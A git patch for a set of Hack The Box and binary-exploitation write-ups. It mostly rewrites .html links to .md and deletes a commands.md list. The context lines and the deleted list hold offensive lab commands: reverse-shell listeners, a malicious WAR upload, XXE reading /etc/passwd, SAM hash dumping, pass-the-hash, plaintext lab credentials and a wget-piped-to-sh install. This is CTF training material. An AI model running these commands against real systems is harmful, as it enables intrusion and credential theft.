From 673311896a8ea22540840570926fa3b428b8b0c9 Mon Sep 17 00:00:00 2001 From: nihilist Date: Wed, 7 May 2025 08:27:22 +0200 Subject: [PATCH] fix the hacking tutorials --- Easy/27.md | 2 +- Easy/48.md | 2 +- Easy/57.md | 2 +- Medium/26.md | 2 +- Medium/28.md | 4 +- Medium/29.md | 2 +- Medium/31.md | 2 +- Medium/34.md | 2 +- Medium/35.md | 2 +- Medium/4.md | 2 +- Medium/46.md | 4 +- Medium/67.md | 2 +- asm/1.md | 2 +- asm/2.md | 2 +- asm/3.md | 2 +- asm/4.md | 2 +- asm/5.md | 2 +- asm/6.md | 2 +- binexp.md | 68 ++++++------ commands.md | 282 ----------------------------------------------- index.md | 306 +++++++++++++++++++++++++-------------------------- 21 files changed, 207 insertions(+), 489 deletions(-) delete mode 100644 commands.md diff --git a/Easy/27.md b/Easy/27.md index 086b691..0f30eca 100644 --- a/Easy/27.md +++ b/Easy/27.md @@ -313,7 +313,7 @@ Seems like we will use the C exploit n°44298. Let's locate it and copy it onto /usr/share/exploitdb/exploits/linux/local/44298.c -Fun Fact : we're going to privesc the exact same way as we did back on the [Bashed](15.html) machine. +Fun Fact : we're going to privesc the exact same way as we did back on the [Bashed](15.md) machine. λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ] diff --git a/Easy/48.md b/Easy/48.md index 6168d16..b8a1558 100644 --- a/Easy/48.md +++ b/Easy/48.md @@ -247,7 +247,7 @@ Here we get the /manager/text URI and if we lookup the tomcat documentation, thi -So from here, just like for the [Kotarak](../Hard/7.html) box, we can upload a malicious WAR file to get us a shell, we're going to generate it using msfvenom: +So from here, just like for the [Kotarak](../Hard/7.md) box, we can upload a malicious WAR file to get us a shell, we're going to generate it using msfvenom: [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] diff --git a/Easy/57.md b/Easy/57.md index a4bad49..3ea1eb1 100644 --- a/Easy/57.md +++ b/Easy/57.md @@ -189,7 +189,7 @@ Just like we saw earlier, we see that the DC name is **EGOTISTICAL-BANK.LOCAL** -Now let's use GetNPusers.py to get the TGT (Ticket Granting Ticket) if the account doesn't need Kerberos pre-authentication, just like we did back on the [Forest](38.html) box. +Now let's use GetNPusers.py to get the TGT (Ticket Granting Ticket) if the account doesn't need Kerberos pre-authentication, just like we did back on the [Forest](38.md) box. [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna] diff --git a/Medium/26.md b/Medium/26.md index c154704..f9c5d2f 100644 --- a/Medium/26.md +++ b/Medium/26.md @@ -587,7 +587,7 @@ We try to ssh as the user prometheus with his assumed password St34l_th3_F1re : icarus@620b296204a3:~$ -We can't ssh on port 2222 as the user prometheus, because he isn't even an user on the box, so assuming from the hades riddle, we can assume that it is about port knocking just like on the box [Nineveh](10.html): +We can't ssh on port 2222 as the user prometheus, because he isn't even an user on the box, so assuming from the hades riddle, we can assume that it is about port knocking just like on the box [Nineveh](10.md): λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus] diff --git a/Medium/28.md b/Medium/28.md index e667503..dfc3a9f 100644 --- a/Medium/28.md +++ b/Medium/28.md @@ -55,7 +55,7 @@ Our nmap scan picked up port 5000 running http Gunicorn 19 so let's investigate ` ![](prg/28_001.png) -Looks like we have a website in construction so let's check out /upload which is a webpage onto which we can upload xml files So just like for [Aragorg](19.html), we will try to do some XXE exploitation, by first trying to print out the /etc/passwd file: +Looks like we have a website in construction so let's check out /upload which is a webpage onto which we can upload xml files So just like for [Aragorg](19.md), we will try to do some XXE exploitation, by first trying to print out the /etc/passwd file: ![](prg/28_002.png) @@ -135,7 +135,7 @@ From there we navigate around and we stumble upon an interesting directory /home 4.0K drwxrwx--- 2 roosa roosa 4.0K Mar 26 2018 src -Now let's get into the .git directory and see if we can print out the previous git commits just like on the [Canape box](25.html) but this time we specify the -p flag in order to list the changes under each commit: +Now let's get into the .git directory and see if we can print out the previous git commits just like on the [Canape box](25.md) but this time we specify the -p flag in order to list the changes under each commit: roosa@gitter:~/work/blogfeed$ git log -p diff --git a/Medium/29.md b/Medium/29.md index 765472b..6ddec94 100644 --- a/Medium/29.md +++ b/Medium/29.md @@ -69,7 +69,7 @@ As always we begin our Enumeration using **Nmap** to enumerate opened ports. We ## **Part 2 : Getting User Access** -Our nmap scan picked up port 80 running http with drupal 7 just like the box [Bastard](2.html) except that this time we are dealing with a linux box. Although our nmap scan also picked up port 21 ftp with anonymous login, so let's check it out first: +Our nmap scan picked up port 80 running http with drupal 7 just like the box [Bastard](2.md) except that this time we are dealing with a linux box. Although our nmap scan also picked up port 21 ftp with anonymous login, so let's check it out first: λ nihilist [ 10.10.14.24/23 ] [~] diff --git a/Medium/31.md b/Medium/31.md index 99cc35a..1a32e60 100644 --- a/Medium/31.md +++ b/Medium/31.md @@ -149,7 +149,7 @@ From there all that we have to do is upload our reverse php shell and use it to → nano nihilist.php -Now the trick here is, we are not on a Linux box like on [Apocalyst](11.html), we need to tweak our reverse php shell like so : +Now the trick here is, we are not on a Linux box like on [Apocalyst](11.md), we need to tweak our reverse php shell like so : <****?php diff --git a/Medium/34.md b/Medium/34.md index 7231ac2..fbde3e8 100644 --- a/Medium/34.md +++ b/Medium/34.md @@ -170,7 +170,7 @@ The interesting directory here is "/debug" which reveals us that the server is u ![](prg/34_001.png) -Here we see that support for IPv6 is enabled so with the combination of snmp running on port 161/udp we are heavily reminded of the previous box [Sneaky](7.html). +Here we see that support for IPv6 is enabled so with the combination of snmp running on port 161/udp we are heavily reminded of the previous box [Sneaky](7.md). ![](prg/34_002.png) diff --git a/Medium/35.md b/Medium/35.md index bf77e07..4d7aa00 100644 --- a/Medium/35.md +++ b/Medium/35.md @@ -268,7 +268,7 @@ Both the IPs are still up. the IP .5 is supposed to be the Firewall, and .4 is s Connection to 192.168.122.4 80 port [tcp/http] succeeded! -So it looks like only 192.168.122.4 responded with 2 opened ports, we seem to have access to port 22 and 80. Now the problem here is, we do not have access to curl on the machine, so my initial thought was to make a ssh tunnel just like we did on [Hawk](29.html). But this case is different since this is not a specific port on the machine (127.0.0.1:port),in this case we need to be able to access an OTHER host through said tunnel: +So it looks like only 192.168.122.4 responded with 2 opened ports, we seem to have access to port 22 and 80. Now the problem here is, we do not have access to curl on the machine, so my initial thought was to make a ssh tunnel just like we did on [Hawk](29.md). But this case is different since this is not a specific port on the machine (127.0.0.1:port),in this case we need to be able to access an OTHER host through said tunnel: _Hawk SSH Tunnel:_ diff --git a/Medium/4.md b/Medium/4.md index 855b566..06caea5 100644 --- a/Medium/4.md +++ b/Medium/4.md @@ -148,7 +148,7 @@ We can, therefore we execute LinEnum.sh after adding the executing right with ch 4.0K -rwxr-xr-x 1 www-data www-data 1.7K Apr 9 2017 artisan -To privesc on the machine, we'll modify the artisan file (which is a php file) to contain a reverse shell, we'll use the same reverse shell named nihilist.php that we used when we did [Popcorn](1.html) +To privesc on the machine, we'll modify the artisan file (which is a php file) to contain a reverse shell, we'll use the same reverse shell named nihilist.php that we used when we did [Popcorn](1.md) λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Cronos] diff --git a/Medium/46.md b/Medium/46.md index 837ecaa..6de2b3d 100644 --- a/Medium/46.md +++ b/Medium/46.md @@ -159,7 +159,7 @@ However as you can see here sadly it is also an authenticated exploit requiring ![](prg/46_007.png) -Before sending this over to the repeater, we see that the request has a Cross Site Request Forgery token (CSRF token) This is used to prevent cross site forgery attacks not necessarily bruteforcing, To continue here we need to take another look at centreon's [REST API documentation](https://docs.centreon.com/docs/centreon/fr/19.04/api/api_rest/) for the current version 19.04 just like for the [Craft](44.html) box: +Before sending this over to the repeater, we see that the request has a Cross Site Request Forgery token (CSRF token) This is used to prevent cross site forgery attacks not necessarily bruteforcing, To continue here we need to take another look at centreon's [REST API documentation](https://docs.centreon.com/docs/centreon/fr/19.04/api/api_rest/) for the current version 19.04 just like for the [Craft](44.md) box: ![](prg/46_008.png) @@ -894,7 +894,7 @@ So here we are hinted towards the /bin/screen-4.5.0 binary which seems to contai -So here we see the public exploits available to us, which should ring a bell because we also did a privesc through the screen binary back in the [Haircut](8.html) box which had literally the same binary as this box, so it will be quite similar: +So here we see the public exploits available to us, which should ring a bell because we also did a privesc through the screen binary back in the [Haircut](8.md) box which had literally the same binary as this box, so it will be quite similar: _Terminal 1:_ diff --git a/Medium/67.md b/Medium/67.md index e1f05f5..9a05c5b 100644 --- a/Medium/67.md +++ b/Medium/67.md @@ -45,7 +45,7 @@ Our nmap scan picked up Apache Tomcat running on port 8080 so let's investigate ![](prg/67_001.png) -So the webserver is apparently a YAML parser, similarly to the [Time](64.html) box, this is probably about deserialization, however unlike for the Time box, giving it random data does not necessarily reveal the backend that's being used. Rather we can simply base our assumption that it is running a java backend because we saw that we were on apache tomcat. So let's look for YAML java deserialization payload by googling a bit, and we stumble upon [this](https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858) article, so let's first verify that this webserver is vulnerable with the following payload: +So the webserver is apparently a YAML parser, similarly to the [Time](64.md) box, this is probably about deserialization, however unlike for the Time box, giving it random data does not necessarily reveal the backend that's being used. Rather we can simply base our assumption that it is running a java backend because we saw that we were on apache tomcat. So let's look for YAML java deserialization payload by googling a bit, and we stumble upon [this](https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858) article, so let's first verify that this webserver is vulnerable with the following payload: !!javax.script.ScriptEngineManager [ diff --git a/asm/1.md b/asm/1.md index e484054..b4f2273 100644 --- a/asm/1.md +++ b/asm/1.md @@ -82,5 +82,5 @@ and now we have our executable file called '0', we make it executable with chmod -And that concludes our first assembly code! in the next part we're going to explain everything about this code [here](2.html). +And that concludes our first assembly code! in the next part we're going to explain everything about this code [here](2.md). diff --git a/asm/2.md b/asm/2.md index c3d660d..34abbf9 100644 --- a/asm/2.md +++ b/asm/2.md @@ -132,5 +132,5 @@ and thus we get resulting final code: Most x86_64 assembly code have 3 sections, the .data section , the .bss section and the .text section. the label we used here _start acts like a function, everytime we will use the word _start in our code, it is going to execute the portion of code that's associated with it. -In the next subject we're going to dig into jumps, calls and comparaisons, you can click [here](3.html). +In the next subject we're going to dig into jumps, calls and comparaisons, you can click [here](3.md). diff --git a/asm/3.md b/asm/3.md index 62942ec..c202093 100644 --- a/asm/3.md +++ b/asm/3.md @@ -100,5 +100,5 @@ Here we're going to use nasm and ld to compile our assembly code, and then we ju → ./3 Hello, World! -In the next tutorial we will see how to get user input, you can click [here](4.html). +In the next tutorial we will see how to get user input, you can click [here](4.md). diff --git a/asm/4.md b/asm/4.md index cdbb64b..fd2a9cf 100644 --- a/asm/4.md +++ b/asm/4.md @@ -118,5 +118,5 @@ Here we're going to use nasm to compile our assembly code and then use ld to cre -And that's it ! in the next tutorial we will cover math operations and the stack, you can click [here](5.html). +And that's it ! in the next tutorial we will cover math operations and the stack, you can click [here](5.md). diff --git a/asm/5.md b/asm/5.md index 6a3df79..4e56024 100644 --- a/asm/5.md +++ b/asm/5.md @@ -84,5 +84,5 @@ Here we're going to use nasm to compile our assembly code: -And that's it ! next tutorial we'll look into loops, you can click [here](6.html). +And that's it ! next tutorial we'll look into loops, you can click [here](6.md). diff --git a/asm/6.md b/asm/6.md index 2470932..e434e8f 100644 --- a/asm/6.md +++ b/asm/6.md @@ -103,5 +103,5 @@ Here we're going to use nasm to compile our assembly code and then use ld to get -And we see that we have been able to print out the Hello World text string inside of test.txt ! In the next tutorial we will check out a minimal shellcode used to spawn a /bin/sh shell. you can click [here](7.html). +And we see that we have been able to print out the Hello World text string inside of test.txt ! In the next tutorial we will check out a minimal shellcode used to spawn a /bin/sh shell. you can click [here](7.md). diff --git a/binexp.md b/binexp.md index df6cd49..2cdcff2 100644 --- a/binexp.md +++ b/binexp.md @@ -4,15 +4,15 @@ ##### Below you fill find my binary exploitation learning notes, the easier challenges are at the top, and the further down you go, the more we dig into advanced concepts. -[ Template Page ](0/0.html) +[ Template Page ](0/0.md) ![](../assets/img/user.png) nihilist ##### Preparing the Tools - 1. [Installing gdb gef](0/gdb.html) - 2. [Installing py pwntools](0/pwntools.html) - 3. [Installing GHIDRA](0/ghidra.html) + 1. [Installing gdb gef](0/gdb.md) + 2. [Installing py pwntools](0/pwntools.md) + 3. [Installing GHIDRA](0/ghidra.md) @@ -28,9 +28,9 @@ The basics of reversing with simple to understand examples - 1. [✅ Strings](1/strings.html) - 2. [✅ Helithumper RE](1/heli.html) - 3. [✅ CSAW 2019 Beleaf](1/beleaf.html) + 1. [✅ Strings](1/strings.md) + 2. [✅ Helithumper RE](1/heli.md) + 3. [✅ CSAW 2019 Beleaf](1/beleaf.md) * | grep strings chmod @@ -45,12 +45,12 @@ The basics of reversing with simple to understand examples These are the most common binary exploits, they are there because of insecure functions that do not set a limit to user input, allowing the user to overwrite other memory registers. - 1. [✅ CSAW 2018 Quals boi](2/boi.html) - 2. [✅ TAMU 2019 pwn1](2/pwn1.html) - 3. [✅ TW 2017 Just Do It!](2/just.html) - 4. [✅ CSAW 2016 Warmup](2/warm.html) - 5. [✅ CSAW 2018 Get it](2/get.html) - 6. [✅ TUCTF 2017 Vulnchat](2/vuln.html) + 1. [✅ CSAW 2018 Quals boi](2/boi.md) + 2. [✅ TAMU 2019 pwn1](2/pwn1.md) + 3. [✅ TW 2017 Just Do It!](2/just.md) + 4. [✅ CSAW 2016 Warmup](2/warm.md) + 5. [✅ CSAW 2018 Get it](2/get.md) + 6. [✅ TUCTF 2017 Vulnchat](2/vuln.md) @@ -69,13 +69,13 @@ These are the most common binary exploits, they are there because of insecure fu As i hit the shellcode buffer overflow binary challenges, i realized that i needed assembly skills, so this is a simple introduction to modern intel Assembly for the x86_64 (64bits) architecture. We make use of the [syscalls](https://chromium.googlesource.com/chromiumos/docs/+/HEAD/constants/syscalls.md#x86_64-64_bit) used to communicate with the Linux Kernel: - 1. [✅ Hello World](asm/1.html) - 2. [✅ Hello World Explained ](asm/2.html) - 3. [✅ Jumps, Calls](asm/3.html) - 4. [✅ User Input](asm/4.html) - 5. [✅ Math Operations](asm/5.html) - 6. [✅ Reading / Writing Files](asm/6.html) - 7. [✅ Spawning a shell](asm/7.html) + 1. [✅ Hello World](asm/1.md) + 2. [✅ Hello World Explained ](asm/2.md) + 3. [✅ Jumps, Calls](asm/3.md) + 4. [✅ User Input](asm/4.md) + 5. [✅ Math Operations](asm/5.md) + 6. [✅ Reading / Writing Files](asm/6.md) + 7. [✅ Spawning a shell](asm/7.md) @@ -83,17 +83,17 @@ As i hit the shellcode buffer overflow binary challenges, i realized that i need ##### 2) Stack Buffer Overflows (Part 2) - 1. [✅ CSAW 2017 Pilot](2/pilot.html) - 2. [✅ Tamu 2019 pwn3](2/pwn3.html) - 3. [✅ Tuctf 2018 shella-easy](2/shella.html) - 4. [✅ BKP 2016 calc](2/calc.html) - 5. [✅ DCQuals 2019 speed](2/speed.html) - 6. [✅ DCQuals 2016 feed](2/feed.html) - 7. [✅ CSAW 2019 babyboi](2/bboi.html) - 8. [✅ CSAW 2017 SVC](2/svc.html) - 9. [✅ FB 2019 Overfloat](2/overf.html) - 10. [✅ hs 2019 storytime](2/hs.html) - 11. [✅ UTC 2019 shellme](2/shme.html) + 1. [✅ CSAW 2017 Pilot](2/pilot.md) + 2. [✅ Tamu 2019 pwn3](2/pwn3.md) + 3. [✅ Tuctf 2018 shella-easy](2/shella.md) + 4. [✅ BKP 2016 calc](2/calc.md) + 5. [✅ DCQuals 2019 speed](2/speed.md) + 6. [✅ DCQuals 2016 feed](2/feed.md) + 7. [✅ CSAW 2019 babyboi](2/bboi.md) + 8. [✅ CSAW 2017 SVC](2/svc.md) + 9. [✅ FB 2019 Overfloat](2/overf.md) + 10. [✅ hs 2019 storytime](2/hs.md) + 11. [✅ UTC 2019 shellme](2/shme.md) @@ -115,9 +115,9 @@ As i hit the shellcode buffer overflow binary challenges, i realized that i need ##### 3) Bad Seed - 1. [✅ h3 time ](3/h3.html) - 2. [✅ hsctf 2019 tux talk ](3/tux.html) - 3. [✅ Sunshine 17 Prepared ](3/prep.html) + 1. [✅ h3 time ](3/h3.md) + 2. [✅ hsctf 2019 tux talk ](3/tux.md) + 3. [✅ Sunshine 17 Prepared ](3/prep.md) diff --git a/commands.md b/commands.md deleted file mode 100644 index 7f3490a..0000000 --- a/commands.md +++ /dev/null @@ -1,282 +0,0 @@ -# ip=10.10.14.48 port=9005 course=2 - Easy/26.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005 - Easy/26.html: → hash-identifier - Easy/11.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.40 - Easy/28.html: → nmap -F 10.10.10.123 - Easy/28.html: → nmap -sC -sV 10.10.10.123 -p 21,22,53,80,139,443,445 - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbmap -H 10.10.10.123 -p 445,139 - Easy/28.html:→ enum4linux 10.10.10.123 - Easy/28.html:→ smbclient \\\\10.10.10.123\\general - Easy/28.html:→ mv creds.txt Friendzone/creds.txt - Easy/28.html:→ mkdir Friendzone - Easy/28.html:→ mv creds.txt Friendzone/creds.txt - Easy/28.html:→ cd Friendzone - Easy/28.html:→ cat creds.txt - Easy/28.html: → nmap 10.10.10.123 --script smb-enum-shares - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → pacman -S blackarch/python2-dnsknife - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → dig axfr @10.10.10.123 friendzone.red - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbclient -H //10.10.10.123/Development - Easy/28.html:λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001 - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001 - Easy/36.html: → nmap -F 10.10.10.149 - Easy/36.html: → nmap -sCV -p80,135,445 10.10.10.149 - Easy/36.html: → git clone https://github.com/theevilbit/ciscot7 - Easy/36.html: → cd ciscot7 - Easy/36.html: → ls [21af318] - Easy/36.html: → python ciscot7.py -p 0242114B0E143F015F5D1E161713 [21af318] - Easy/36.html: → python ciscot7.py -p 02375012182C1A1D751618034F36415408 [21af318] - Easy/36.html: → echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' >> cis.md5 [21af318] - Easy/36.html: → cat cis.md5 [21af318] - Easy/36.html: → hashcat -m 500 [21af318] - Easy/36.html: → hashcat -m 500 cis.md5 /usr/share/wordlists/rockyou.txt [21af318] - Easy/36.html:→ nano users.txt - Easy/36.html:→ nano pass.txt - Easy/36.html:→ crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt - Easy/36.html: → msfdb init - Easy/36.html: → msfconsole - Easy/36.html:→ locate psexec.py - Easy/36.html:→ cd /usr/share/doc/python3-impacket/examples/ - Easy/36.html:→ ls - Easy/36.html:→ python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149 - Easy/36.html: → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149 - Easy/36.html: → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt - Easy/36.html: → git clone https://github.com/Hackplayers/evil-winrm - Easy/36.html: → cd evil-winrm - Easy/36.html: → cat Gemfile [e501272] - Easy/36.html: → gem install winrm winrm-fs stringio [e501272] - Easy/36.html: → sudo !! [e501272] - Easy/36.html: → sudo gem install winrm winrm-fs stringio [e501272] - Easy/36.html: → ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149 [e501272] - Easy/36.html: → wget https://download.sysinternals.com/files/SysinternalsSuite.zip - Easy/36.html: → mv ~/Downloads/SysinternalsSuite.zip . - Easy/36.html: → unzip SysinternalsSuite.zip - Easy/36.html: → strings firefox.exe_200218_153036.dmp | grep pass [e501272] - Easy/36.html: → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares - Easy/36.html:→ python3 psexec.py administrator@10.10.10.149 - Easy/31.html: → nmap -F 10.10.10.134 - Easy/31.html: → nmap -sCV -p22,135,139,445 10.10.10.134 - Easy/31.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/] → smbclient -L //10.10.10.134/ -U "" - Easy/31.html: → smbclient //10.10.10.134/Backups - Easy/31.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bastion] → cat note.txt - Easy/31.html:→ mount -t cifs //10.10.10.134/Backups mount - Easy/31.html:→ ls && cd mount - Easy/31.html:→ ls - Easy/31.html: → smbmap -u nihilist -H 10.10.10.134 - Easy/31.html: → ls - Easy/31.html: → ls - Easy/31.html: → du -hs WindowsImageBackup - Easy/31.html: → cd WindowsImageBackup - Easy/31.html: → cd L4mpje-PC - Easy/31.html: → ls - Easy/31.html: → cd Backup\ 2019-02-22\ 124351 - Easy/31.html: → du -hs * - Easy/31.html: → guestmount - Easy/31.html: → apt install libguestfs-tools && guestmount --help - Easy/31.html: → mkdir /home/nihilist/_HTB/Bastion/vhd - Easy/31.html: → guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /home/nihilist/_HTB/Bastion/vhd - Easy/31.html: → cd /home/nihilist/_HTB/Bastion - Easy/31.html: → cd vhd - Easy/31.html: → ls - Easy/31.html:→ find Desktop Documents Downloads -ls - Easy/31.html: → cd ../.. - Easy/31.html: → cd Windows/System32/config - Easy/31.html: → ls - Easy/31.html: → cp SAM SYSTEM /home/nihilist/_HTB/Bastion - Easy/31.html: → cd ../../../.. - Easy/31.html: → ls - Easy/31.html: → file SAM SYSTEM - Easy/31.html: → mkdir backup && mv SAM backup/ && mv SYSTEM backup/ - Easy/31.html: → cd backup - Easy/31.html: → ls - Easy/31.html: → impacket-secretsdump -sam SAM -system SYSTEM local - Easy/31.html:→ smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134 - Easy/31.html:→ ssh L4mpje@10.10.10.134 - Easy/31.html: → cd vhd - Easy/31.html: → ls - Easy/31.html: → cd Windows/System32/config - Easy/31.html: → ls -lash | grep SAM - Easy/31.html: → ls -lash | grep SYSTEM - Easy/31.html: → cd ../../.. - Easy/31.html: → cd .. - Easy/31.html: → curl -sk https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 > jaws-enum.ps1 - Easy/31.html: → ifconfig | grep inet - Easy/31.html: → python -m SimpleHTTPServer 8080 - Easy/31.html:→ curl -sk https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py > mremoteng.py - Easy/31.html:→ python3 mremoteng.py - Easy/31.html: → python3 mremoteng.py -s yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB - Easy/31.html: → python3 mremoteng.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== - Easy/31.html:→ ssh Administrator@10.10.10.134 - Easy/31.html: → ssh Administrator@10.10.10.134 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.68 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.68/ - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nano rev.php - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → cat rev.php - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80 - Easy/15.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → curl -vsk http://10.10.10.68/uploads/rev.php - Easy/15.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → searchsploit kernel 4.4 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → locate 44298.c - Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → cp /usr/share/exploitdb/exploits/linux/local/44298.c . - Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → gcc -o 44298 -m64 44298.c - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → ls - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80 - Easy/22.html: → nmap 10.10.10.98 -F - Easy/22.html:→ nmap -sCV 10.10.10.98 - Easy/22.html:→ ftp 10.10.10.98 - Easy/22.html:→ 7z x Access\ Control.zip - Easy/22.html:→ ls - Easy/22.html:→ file backup.mdb - Easy/22.html: → 7z x Access\ Control.zip -paccess4u@security - Easy/22.html: → ls - Easy/22.html: → file Access\ Control.pst - Easy/22.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Access] → telnet 10.10.10.98 - Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.75 - Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.75/ - Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.75/nibbleblog/ - Easy/16.html:λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Nibbleblog 4.0.3 - Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → msfconsole - Easy/33.html: → nmap -F 10.10.10.138 - Easy/33.html:→ nmap -sCV -p80 10.10.10.138 - Easy/33.html: → echo '10.10.10.138 writeup.htb' >> /etc/hosts - Easy/33.html: → curl -sk http://writeup.htb/ - Easy/33.html: → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50 - Easy/33.html: → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50 - Easy/33.html: → nikto -h http://10.10.10.138/ - Easy/33.html: → curl -sk http://10.10.10.138/robots.txt - Easy/33.html: → curl -sk http://10.10.10.138/writeup/ | grep CMS - Easy/33.html:→ searchsploit CMS Made Simple | grep Injection - Easy/33.html:→ locate 46635.py - Easy/33.html:→ cp /usr/share/exploitdb/exploits/php/webapps/46635.py . - Easy/33.html:→ nano 46635.py - Easy/33.html:→ python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt - Easy/33.html: → ssh jkr@writeup.htb - Easy/33.html:→ cat nihilist.py - Easy/33.html:→ python -m SimpleHTTPServer 8080 - Easy/33.html:→ nc -lvnp 1234 - Easy/33.html: → ssh jkr@10.10.10.138 - Easy/33.html:→ nc -lvnp 1234 - Easy/35.html: → nmap -F 10.10.10.147 --top-ports 10000 -vvv - Easy/35.html: → nmap -sCV -p22,80,1337 10.10.10.147 - Easy/35.html: → nikto -h http://10.10.10.147/ - Easy/35.html: → dirsearch -u http://10.10.10.147/ -e php,html,txt,js - Easy/35.html: → ls - Easy/35.html: → file myapp - Easy/35.html: → chmod +x myapp - Easy/35.html: → gdb ./myapp - Easy/35.html:→ wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh - Easy/35.html:→ gdb -q myapp - Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) - Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 - Easy/35.html:$rsp : 0x00007fffffffe438 → "AAAAAAAA" - Easy/35.html:$rsi : 0x00000000004052a0 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" - Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret - Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 - Easy/35.html:0x00007fffffffe448│+0x0010: 0x00007fffffffe518 → 0x00007fffffffe774 → "/home/nihilist/_HTB/Safe/Ghidra/myapp" - Easy/35.html:0x00007fffffffe458│+0x0020: 0x000000000040115f → <****main+0> push rbp - Easy/35.html:0x00007fffffffe470│+0x0038: 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html: → 0x4011ac <****main+77> ret - Easy/35.html:[#0] 0x4011ac → main() - Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) - Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 - Easy/35.html:$rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]" - Easy/35.html:$rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]" - Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret - Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 - Easy/35.html: → 0x4011ac <****main+77> ret - Easy/35.html:[#0] 0x4011ac → main() - Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) - Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 - Easy/35.html:$rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]" - Easy/35.html:$rsi : 0x00000000004052a0 → 